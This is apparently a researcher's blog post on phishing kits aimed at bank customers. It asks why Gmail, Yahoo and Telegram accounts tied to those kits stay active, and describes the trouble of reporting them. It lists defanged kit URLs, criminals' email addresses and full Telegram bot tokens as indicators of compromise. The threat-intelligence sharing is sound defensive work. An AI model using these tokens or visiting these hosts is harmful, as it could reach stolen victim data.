Free time is less and less, nevertheless I try to dedicate at least a couple of hours every week to the analysis of the Matrix evidence. I dedicate some time to the analysis of phishing kits and to the sharing of the email and Telegram token indicators on my public ioc repo: https://github.com/ecarlesi/ioc.git
From this analysis a spontaneous question arises: why do the same accounts continue to be active over time? Does no one notice that they are being used for illicit purposes?
The obvious answer might be that Telegram is based in Dubai, founded by a Russian, maybe preventing or mitigating fraud is not at the forefront of their minds. Maybe. Let’s say the same goes for Yandex, they are Russian. Maybe. What I don’t understand though is why they don’t block Gmail and Yahoo accounts either, just to name two non-Russian companies.
Let’s take the segdairo as gmail dot com account for example. I personally found it in 5 different attacks, the first one dating back to May 13, 2024.
Later I found it in other kits within which I identified other indicators:
- hxxps://digitalbankingsonoraweb[.]online/verify/SONORA%20CU.zip contains the Telegram token 5453712056:AAE5M0Nnbcm0eanesMhIV62mNU_WgM20A6c
- hxxps://dlgitaldove88system[.]online/FIRST%20FIFELITY%20BANK.zip contains the Telegram token 7223951606:AAHTkeSZ1UFauExPuwkzK_wfORFsldNFbnA
- hxxps://digitalconnectfirstnow[.]online/FIRST%20UNITED%20BANK.zip contains the email account hakekelly07 at gmail dot com and the Telegram token 7103172103:AAFibon0scauwaJ6gnsY3vBfQ7e13IST9QY
- hxxps://online-ctricbonline[.]cfd/cancel/login%20(1).zip contains the Telegram token 6318747656:AAFlcQchhlCb9DNkfpXvCEKXhSr0yINXgQc
- hxxps://dashboardverfedconnect[.]online/VERMONT%20FCU.zip contains the Telegram token 7482950914:AAEupDhXYLKY_vvZHvwiCdgG_A2y4W5Jgn8
Not understanding why email accounts are blocked even when they are clearly involved in illicit activities, I tried to understand how to report a criminal email account. Searching on the internet I found some instructions from Google that talk about how to report an email received. However, I did not find how to report an email involved in illicit activities without having received any email from it in my Gmail account. I also found directions regarding Google Workspace accounts, which are very convenient, but this is not the case.
I finally found a link to the Internet Crime Complaint Center (ic3[.]gov). There is a form to report the event. It is now dinner time, given the length of the form, maybe I will do it after dinner.
Here I found something interesting: the Government explains how to recognize a legitimate Government domain, there is “.gov” and the padlock that indicates the use of https…
I would say not very well since every day there are thousands of new domains that meet these requirements π
Emiliano Carlesi's blog 